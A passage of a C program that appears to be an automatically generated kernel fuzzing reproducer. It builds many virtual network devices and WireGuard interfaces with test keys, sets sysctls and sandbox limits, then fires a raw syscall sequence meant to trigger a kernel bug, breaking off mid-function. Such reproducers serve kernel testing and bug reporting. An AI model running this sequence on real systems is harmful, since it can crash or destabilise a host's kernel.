	WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL,
	WGPEER_A_LAST_HANDSHAKE_TIME,
	WGPEER_A_RX_BYTES,
	WGPEER_A_TX_BYTES,
	WGPEER_A_ALLOWEDIPS,
	WGPEER_A_PROTOCOL_VERSION,
};
enum wgallowedip_attribute {
	WGALLOWEDIP_A_UNSPEC,
	WGALLOWEDIP_A_FAMILY,
	WGALLOWEDIP_A_IPADDR,
	WGALLOWEDIP_A_CIDR_MASK,
};

static void netlink_wireguard_setup(void)
{
	const char ifname_a[] = "wg0";
	const char ifname_b[] = "wg1";
	const char ifname_c[] = "wg2";
	const char private_a[] = "\xa0\x5c\xa8\x4f\x6c\x9c\x8e\x38\x53\xe2\xfd\x7a\x70\xae\x0f\xb2\x0f\xa1\x52\x60\x0c\xb0\x08\x45\x17\x4f\x08\x07\x6f\x8d\x78\x43";
	const char private_b[] = "\xb0\x80\x73\xe8\xd4\x4e\x91\xe3\xda\x92\x2c\x22\x43\x82\x44\xbb\x88\x5c\x69\xe2\x69\xc8\xe9\xd8\x35\xb1\x14\x29\x3a\x4d\xdc\x6e";
	const char private_c[] = "\xa0\xcb\x87\x9a\x47\xf5\xbc\x64\x4c\x0e\x69\x3f\xa6\xd0\x31\xc7\x4a\x15\x53\xb6\xe9\x01\xb9\xff\x2f\x51\x8c\x78\x04\x2f\xb5\x42";
	const char public_a[] = "\x97\x5c\x9d\x81\xc9\x83\xc8\x20\x9e\xe7\x81\x25\x4b\x89\x9f\x8e\xd9\x25\xae\x9f\x09\x23\xc2\x3c\x62\xf5\x3c\x57\xcd\xbf\x69\x1c";
	const char public_b[] = "\xd1\x73\x28\x99\xf6\x11\xcd\x89\x94\x03\x4d\x7f\x41\x3d\xc9\x57\x63\x0e\x54\x93\xc2\x85\xac\xa4\x00\x65\xcb\x63\x11\xbe\x69\x6b";
	const char public_c[] = "\xf4\x4d\xa3\x67\xa8\x8e\xe6\x56\x4f\x02\x02\x11\x45\x67\x27\x08\x2f\x5c\xeb\xee\x8b\x1b\xf5\xeb\x73\x37\x34\x1b\x45\x9b\x39\x22";
	const uint16_t listen_a = 20001;
	const uint16_t listen_b = 20002;
	const uint16_t listen_c = 20003;
	const uint16_t af_inet = AF_INET;
	const uint16_t af_inet6 = AF_INET6;
	const struct sockaddr_in endpoint_b_v4 = {
	    .sin_family = AF_INET,
	    .sin_port = htons(listen_b),
	    .sin_addr = {htonl(INADDR_LOOPBACK)}};
	const struct sockaddr_in endpoint_c_v4 = {
	    .sin_family = AF_INET,
	    .sin_port = htons(listen_c),
	    .sin_addr = {htonl(INADDR_LOOPBACK)}};
	struct sockaddr_in6 endpoint_a_v6 = {
	    .sin6_family = AF_INET6,
	    .sin6_port = htons(listen_a)};
	endpoint_a_v6.sin6_addr = in6addr_loopback;
	struct sockaddr_in6 endpoint_c_v6 = {
	    .sin6_family = AF_INET6,
	    .sin6_port = htons(listen_c)};
	endpoint_c_v6.sin6_addr = in6addr_loopback;
	const struct in_addr first_half_v4 = {0};
	const struct in_addr second_half_v4 = {(uint32_t)htonl(128 << 24)};
	const struct in6_addr first_half_v6 = {{{0}}};
	const struct in6_addr second_half_v6 = {{{0x80}}};
	const uint8_t half_cidr = 1;
	const uint16_t persistent_keepalives[] = {1, 3, 7, 9, 14, 19};
	struct genlmsghdr genlhdr = {
	    .cmd = WG_CMD_SET_DEVICE,
	    .version = 1};
	int sock;
	int id, err;
	sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
	if (sock == -1) {
		return;
	}
	id = netlink_query_family_id(&nlmsg, sock, WG_GENL_NAME, true);
	if (id == -1)
		goto error;
	netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr));
	netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_a, strlen(ifname_a) + 1);
	netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_a, 32);
	netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_a, 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4, sizeof(endpoint_b_v4));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[0], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, sizeof(first_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, sizeof(first_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v6, sizeof(endpoint_c_v6));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[1], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, sizeof(second_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, sizeof(second_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	err = netlink_send(&nlmsg, sock);
	if (err < 0) {
	}
	netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr));
	netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_b, strlen(ifname_b) + 1);
	netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_b, 32);
	netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_b, 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6, sizeof(endpoint_a_v6));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[2], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, sizeof(first_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, sizeof(first_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v4, sizeof(endpoint_c_v4));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[3], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, sizeof(second_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, sizeof(second_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	err = netlink_send(&nlmsg, sock);
	if (err < 0) {
	}
	netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr));
	netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_c, strlen(ifname_c) + 1);
	netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_c, 32);
	netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_c, 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6, sizeof(endpoint_a_v6));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[4], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, sizeof(first_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, sizeof(first_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4, sizeof(endpoint_b_v4));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[5], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, sizeof(second_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, sizeof(second_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	err = netlink_send(&nlmsg, sock);
	if (err < 0) {
	}

error:
	close(sock);
}
static void initialize_netdevices(void)
{
	char netdevsim[16];
	sprintf(netdevsim, "netdevsim%d", (int)procid);
	struct {
		const char* type;
		const char* dev;
	} devtypes[] = {
	    {"ip6gretap", "ip6gretap0"},
	    {"bridge", "bridge0"},
	    {"vcan", "vcan0"},
	    {"bond", "bond0"},
	    {"team", "team0"},
	    {"dummy", "dummy0"},
	    {"nlmon", "nlmon0"},
	    {"caif", "caif0"},
	    {"batadv", "batadv0"},
	    {"vxcan", "vxcan1"},
	    {"netdevsim", netdevsim},
	    {"veth", 0},
	    {"xfrm", "xfrm0"},
	    {"wireguard", "wg0"},
	    {"wireguard", "wg1"},
	    {"wireguard", "wg2"},
	};
	const char* devmasters[] = {"bridge", "bond", "team", "batadv"};
	struct {
		const char* name;
		int macsize;
		bool noipv6;
	} devices[] = {
	    {"lo", ETH_ALEN},
	    {"sit0", 0},
	    {"bridge0", ETH_ALEN},
	    {"vcan0", 0, true},
	    {"tunl0", 0},
	    {"gre0", 0},
	    {"gretap0", ETH_ALEN},
	    {"ip_vti0", 0},
	    {"ip6_vti0", 0},
	    {"ip6tnl0", 0},
	    {"ip6gre0", 0},
	    {"ip6gretap0", ETH_ALEN},
	    {"erspan0", ETH_ALEN},
	    {"bond0", ETH_ALEN},
	    {"veth0", ETH_ALEN},
	    {"veth1", ETH_ALEN},
	    {"team0", ETH_ALEN},
	    {"veth0_to_bridge", ETH_ALEN},
	    {"veth1_to_bridge", ETH_ALEN},
	    {"veth0_to_bond", ETH_ALEN},
	    {"veth1_to_bond", ETH_ALEN},
	    {"veth0_to_team", ETH_ALEN},
	    {"veth1_to_team", ETH_ALEN},
	    {"veth0_to_hsr", ETH_ALEN},
	    {"veth1_to_hsr", ETH_ALEN},
	    {"hsr0", 0},
	    {"dummy0", ETH_ALEN},
	    {"nlmon0", 0},
	    {"vxcan0", 0, true},
	    {"vxcan1", 0, true},
	    {"caif0", ETH_ALEN},
	    {"batadv0", ETH_ALEN},
	    {netdevsim, ETH_ALEN},
	    {"xfrm0", ETH_ALEN},
	    {"veth0_virt_wifi", ETH_ALEN},
	    {"veth1_virt_wifi", ETH_ALEN},
	    {"virt_wifi0", ETH_ALEN},
	    {"veth0_vlan", ETH_ALEN},
	    {"veth1_vlan", ETH_ALEN},
	    {"vlan0", ETH_ALEN},
	    {"vlan1", ETH_ALEN},
	    {"macvlan0", ETH_ALEN},
	    {"macvlan1", ETH_ALEN},
	    {"ipvlan0", ETH_ALEN},
	    {"ipvlan1", ETH_ALEN},
	    {"veth0_macvtap", ETH_ALEN},
	    {"veth1_macvtap", ETH_ALEN},
	    {"macvtap0", ETH_ALEN},
	    {"macsec0", ETH_ALEN},
	    {"veth0_to_batadv", ETH_ALEN},
	    {"veth1_to_batadv", ETH_ALEN},
	    {"batadv_slave_0", ETH_ALEN},
	    {"batadv_slave_1", ETH_ALEN},
	    {"geneve0", ETH_ALEN},
	    {"geneve1", ETH_ALEN},
	    {"wg0", 0},
	    {"wg1", 0},
	    {"wg2", 0},
	};
	int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
	if (sock == -1)
	exit(1);
	unsigned i;
	for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++)
		netlink_add_device(&nlmsg, sock, devtypes[i].type, devtypes[i].dev);
	for (i = 0; i < sizeof(devmasters) / (sizeof(devmasters[0])); i++) {
		char master[32], slave0[32], veth0[32], slave1[32], veth1[32];
		sprintf(slave0, "%s_slave_0", devmasters[i]);
		sprintf(veth0, "veth0_to_%s", devmasters[i]);
		netlink_add_veth(&nlmsg, sock, slave0, veth0);
		sprintf(slave1, "%s_slave_1", devmasters[i]);
		sprintf(veth1, "veth1_to_%s", devmasters[i]);
		netlink_add_veth(&nlmsg, sock, slave1, veth1);
		sprintf(master, "%s0", devmasters[i]);
		netlink_device_change(&nlmsg, sock, slave0, false, master, 0, 0, NULL);
		netlink_device_change(&nlmsg, sock, slave1, false, master, 0, 0, NULL);
	}
	netlink_device_change(&nlmsg, sock, "bridge_slave_0", true, 0, 0, 0, NULL);
	netlink_device_change(&nlmsg, sock, "bridge_slave_1", true, 0, 0, 0, NULL);
	netlink_add_veth(&nlmsg, sock, "hsr_slave_0", "veth0_to_hsr");
	netlink_add_veth(&nlmsg, sock, "hsr_slave_1", "veth1_to_hsr");
	netlink_add_hsr(&nlmsg, sock, "hsr0", "hsr_slave_0", "hsr_slave_1");
	netlink_device_change(&nlmsg, sock, "hsr_slave_0", true, 0, 0, 0, NULL);
	netlink_device_change(&nlmsg, sock, "hsr_slave_1", true, 0, 0, 0, NULL);
	netlink_add_veth(&nlmsg, sock, "veth0_virt_wifi", "veth1_virt_wifi");
	netlink_add_linked(&nlmsg, sock, "virt_wifi", "virt_wifi0", "veth1_virt_wifi");
	netlink_add_veth(&nlmsg, sock, "veth0_vlan", "veth1_vlan");
	netlink_add_vlan(&nlmsg, sock, "vlan0", "veth0_vlan", 0, htons(ETH_P_8021Q));
	netlink_add_vlan(&nlmsg, sock, "vlan1", "veth0_vlan", 1, htons(ETH_P_8021AD));
	netlink_add_macvlan(&nlmsg, sock, "macvlan0", "veth1_vlan");
	netlink_add_macvlan(&nlmsg, sock, "macvlan1", "veth1_vlan");
	netlink_add_ipvlan(&nlmsg, sock, "ipvlan0", "veth0_vlan", IPVLAN_MODE_L2, 0);
	netlink_add_ipvlan(&nlmsg, sock, "ipvlan1", "veth0_vlan", IPVLAN_MODE_L3S, IPVLAN_F_VEPA);
	netlink_add_veth(&nlmsg, sock, "veth0_macvtap", "veth1_macvtap");
	netlink_add_linked(&nlmsg, sock, "macvtap", "macvtap0", "veth0_macvtap");
	netlink_add_linked(&nlmsg, sock, "macsec", "macsec0", "veth1_macvtap");
	char addr[32];
	sprintf(addr, DEV_IPV4, 14 + 10);
	struct in_addr geneve_addr4;
	if (inet_pton(AF_INET, addr, &geneve_addr4) <= 0)
	exit(1);
	struct in6_addr geneve_addr6;
	if (inet_pton(AF_INET6, "fc00::01", &geneve_addr6) <= 0)
	exit(1);
	netlink_add_geneve(&nlmsg, sock, "geneve0", 0, &geneve_addr4, 0);
	netlink_add_geneve(&nlmsg, sock, "geneve1", 1, 0, &geneve_addr6);
	netdevsim_add((int)procid, 4);
	netlink_wireguard_setup();
	for (i = 0; i < sizeof(devices) / (sizeof(devices[0])); i++) {
		char addr[32];
		sprintf(addr, DEV_IPV4, i + 10);
		netlink_add_addr4(&nlmsg, sock, devices[i].name, addr);
		if (!devices[i].noipv6) {
			sprintf(addr, DEV_IPV6, i + 10);
			netlink_add_addr6(&nlmsg, sock, devices[i].name, addr);
		}
		uint64_t macaddr = DEV_MAC + ((i + 10ull) << 40);
		netlink_device_change(&nlmsg, sock, devices[i].name, true, 0, &macaddr, devices[i].macsize, NULL);
	}
	close(sock);
}
static void initialize_netdevices_init(void)
{
	int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
	if (sock == -1)
	exit(1);
	struct {
		const char* type;
		int macsize;
		bool noipv6;
		bool noup;
	} devtypes[] = {
	    {"nr", 7, true},
	    {"rose", 5, true, true},
	};
	unsigned i;
	for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++) {
		char dev[32], addr[32];
		sprintf(dev, "%s%d", devtypes[i].type, (int)procid);
		sprintf(addr, "172.30.%d.%d", i, (int)procid + 1);
		netlink_add_addr4(&nlmsg, sock, dev, addr);
		if (!devtypes[i].noipv6) {
			sprintf(addr, "fe88::%02x:%02x", i, (int)procid + 1);
			netlink_add_addr6(&nlmsg, sock, dev, addr);
		}
		int macsize = devtypes[i].macsize;
		uint64_t macaddr = 0xbbbbbb + ((unsigned long long)i << (8 * (macsize - 2))) +
				 (procid << (8 * (macsize - 1)));
		netlink_device_change(&nlmsg, sock, dev, !devtypes[i].noup, 0, &macaddr, macsize, NULL);
	}
	close(sock);
}

#define MAX_FDS 30

static void setup_common()
{
	if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) {
	}
}

static void setup_binderfs()
{
	if (mkdir("/dev/binderfs", 0777)) {
	}
	if (mount("binder", "/dev/binderfs", "binder", 0, NULL)) {
	}
	if (symlink("/dev/binderfs", "./binderfs")) {
	}
}

static void loop();

static void sandbox_common()
{
	prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
	setsid();
	struct rlimit rlim;
	rlim.rlim_cur = rlim.rlim_max = (200 << 20);
	setrlimit(RLIMIT_AS, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 32 << 20;
	setrlimit(RLIMIT_MEMLOCK, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 136 << 20;
	setrlimit(RLIMIT_FSIZE, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 1 << 20;
	setrlimit(RLIMIT_STACK, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 0;
	setrlimit(RLIMIT_CORE, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 256;
	setrlimit(RLIMIT_NOFILE, &rlim);
	if (unshare(CLONE_NEWNS)) {
	}
	if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
	}
	if (unshare(CLONE_NEWIPC)) {
	}
	if (unshare(0x02000000)) {
	}
	if (unshare(CLONE_NEWUTS)) {
	}
	if (unshare(CLONE_SYSVSEM)) {
	}
	typedef struct {
		const char* name;
		const char* value;
	} sysctl_t;
	static const sysctl_t sysctls[] = {
	    {"/proc/sys/kernel/shmmax", "16777216"},
	    {"/proc/sys/kernel/shmall", "536870912"},
	    {"/proc/sys/kernel/shmmni", "1024"},
	    {"/proc/sys/kernel/msgmax", "8192"},
	    {"/proc/sys/kernel/msgmni", "1024"},
	    {"/proc/sys/kernel/msgmnb", "1024"},
	    {"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
	};
	unsigned i;
	for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
		write_file(sysctls[i].name, sysctls[i].value);
}

static int wait_for_loop(int pid)
{
	if (pid < 0)
	exit(1);
	int status = 0;
	while (waitpid(-1, &status, __WALL) != pid) {
	}
	return WEXITSTATUS(status);
}

static void drop_caps(void)
{
	struct __user_cap_header_struct cap_hdr = {};
	struct __user_cap_data_struct cap_data[2] = {};
	cap_hdr.version = _LINUX_CAPABILITY_VERSION_3;
	cap_hdr.pid = getpid();
	if (syscall(SYS_capget, &cap_hdr, &cap_data))
	exit(1);
	const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE);
	cap_data[0].effective &= ~drop;
	cap_data[0].permitted &= ~drop;
	cap_data[0].inheritable &= ~drop;
	if (syscall(SYS_capset, &cap_hdr, &cap_data))
	exit(1);
}

static int do_sandbox_none(void)
{
	//if (unshare(CLONE_NEWPID)) {
	//}
	//int pid = fork();
	//if (pid != 0)
	//	return wait_for_loop(pid);
	setup_common();
	sandbox_common();
	//drop_caps();
	initialize_netdevices_init();
	//if (unshare(CLONE_NEWNET)) {
	//}
	write_file("/proc/sys/net/ipv4/ping_group_range", "0 65535");
	initialize_netdevices();
	//setup_binderfs();
	loop();
	//exit(1);
}

static void kill_and_wait(int pid, int* status)
{
	kill(-pid, SIGKILL);
	kill(pid, SIGKILL);
	for (int i = 0; i < 100; i++) {
		if (waitpid(-1, status, WNOHANG | __WALL) == pid)
			return;
		usleep(1000);
	}
	DIR* dir = opendir("/sys/fs/fuse/connections");
	if (dir) {
		for (;;) {
			struct dirent* ent = readdir(dir);
			if (!ent)
				break;
			if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
				continue;
			char abort[300];
			snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name);
			int fd = open(abort, O_WRONLY);
			if (fd == -1) {
				continue;
			}
			if (write(fd, abort, 1) < 0) {
			}
			close(fd);
		}
		closedir(dir);
	} else {
	}
	while (waitpid(-1, status, __WALL) != pid) {
	}
}

static void setup_test()
{
	prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
	setpgrp();
	write_file("/proc/self/oom_score_adj", "1000");
}

static void close_fds()
{
	for (int fd = 3; fd < MAX_FDS; fd++)
		close(fd);
}

static void execute_one(void);

#define WAIT_FLAGS __WALL

static void loop(void)
{
	int iter = 0;
	for (;; iter++) {
		int pid = fork();
		if (pid < 0)
	exit(1);
		if (pid == 0) {
			setup_test();
			execute_one();
			close_fds();
			exit(0);
		}
		int status = 0;
		uint64_t start = current_time_ms();
		for (;;) {
			if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
				break;
			sleep_ms(1);
			if (current_time_ms() - start < 5000)
				continue;
			kill_and_wait(pid, &status);
			break;
		}
	}
}

uint64_t r[4] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff};

void execute_one(void)
{
		intptr_t res = 0;
	res = syscall(__NR_pipe, 0x20000000ul);
	if (res != -1) {
r[0] = *(uint32_t*)0x20000000;
r[1] = *(uint32_t*)0x20000004;
	}
	res = syscall(__NR_socket, 2ul, 2ul, 0);
	if (res != -1)
		r[2] = res;
	syscall(__NR_close, r[2]);
	res = syscall(__NR_socket, 0xaul, 3ul, 0x3c);
	if (res != -1)
		r[3] = res;
*(uint8_t*)0x20000100 = 0x7f;
*(uint8_t*)0x20000101 = 0x45;
*(uint8_t*)0x20000102 = 0x4c;
*(uint8_t*)0x20000103 = 0x46;
*(uint8_t*)0x20000104 = 0;
*(uint8_t*)0x20000105 = 0;
*(uint8_t*)0x20000106 = 0x30;
*(uint8_t*)0x20000107 = 0;
*(uint64_t*)0x20000108 = 0;
*(uint16_t*)0x20000110 = 0;
*(uint16_t*)0x20000112 = 0;
*(uint32_t*)0x20000114 = 0;
*(uint32_t*)0x20000118 = 0;
*(uint32_t*)0x2000011c = 0x38;
*(uint32_t*)0x20000120 = 0;
*(uint32_t*)0x20000124 = 0x800000;
*(uint16_t*)0x20000128 = 0;
*(uint16_t*)0x2000012a = 0x20;
*(uint16_t*)0x2000012c = 1;
*(uint16_t*)0x2000012e = 0;
*(uint16_t*)0x20000130 = 0;
*(uint16_t*)0x20000132 = 0x80;
memset((void*)0x20000138, 0, 256);
memset((void*)0x20000238, 0, 256);
memset((void*)0x20000338, 0, 256);
memset((void*)0x20000438, 0, 256);
memset((void*)0x20000538, 0, 256);
memset((void*)0x20000638, 0, 256);
memset((void*)0x20000738, 0, 256);
memset((void*)0x20000838, 0, 256);
	syscall(__NR_write, r[1], 0x20000100ul, 0x838ul);
*(uint16_t*)0x20000040 = 0xa;
*(uint16_t*)0x20000042 = htobe16(0);
*(uint32_t*)0x20000044 = htobe32(0);
*(uint8_t*)0x20000048 = -1;
*(uint8_t*)0x20000049 = 2;
memset((void*)0x2000004a, 0, 13);
*(uint8_t*)0x20000057 = 1;
*(uint32_t*)0x20000058 = 7;
	syscall(__NR_connect, r[3], 0x20000040ul, 0x1cul);
*(uint32_t*)0x200000c0 = 0x910;
	syscall(__NR_setsockopt, r[3], 0x29, 7, 0x200000c0ul, 4ul);
*(uint8_t*)0x20000f00 = 1;
*(uint8_t*)0x20000f01 = 0x25;
memset((void*)0x20000f02, 0, 6);
*(uint8_t*)0x20000f08 = 0;
*(uint8_t*)0x20000f09 = 0;
*(uint8_t*)0x20000f0a = 7;
*(uint8_t*)0x20000f0b = 0x28;
*(uint32_t*)0x20000f0c = htobe32(3);
*(uint8_t*)0x20000f10 = 8;
*(uint8_t*)0x20000f11 = 0x3f;
*(uint16_t*)0x20000f12 = 0xf735;
*(uint64_t*)0x20000f14 = 7;
*(uint64_t*)0x20000f1c = 0xfffffffeffffffff;
*(uint64_t*)0x20000f24 = 3;
*(uint64_t*)0x20000f2c = 0x1f;
*(uint8_t*)0x20000f34 = 0xc9;
*(uint8_t*)0x20000f35 = 0x10;
*(uint8_t*)0x20000f36 = -1;
*(uint8_t*)0x20000f37 = 1;
memset((void*)0x20000f38, 0, 13);
*(uint8_t*)0x20000f45 = 1;
*(uint8_t*)0x20000f46 = 1;
*(uint8_t*)0x20000f47 = 1;
*(uint8_t*)0x20000f48 = 0;
*(uint8_t*)0x20000f49 = 3;
*(uint8_t*)0x20000f4a = 0xd6;
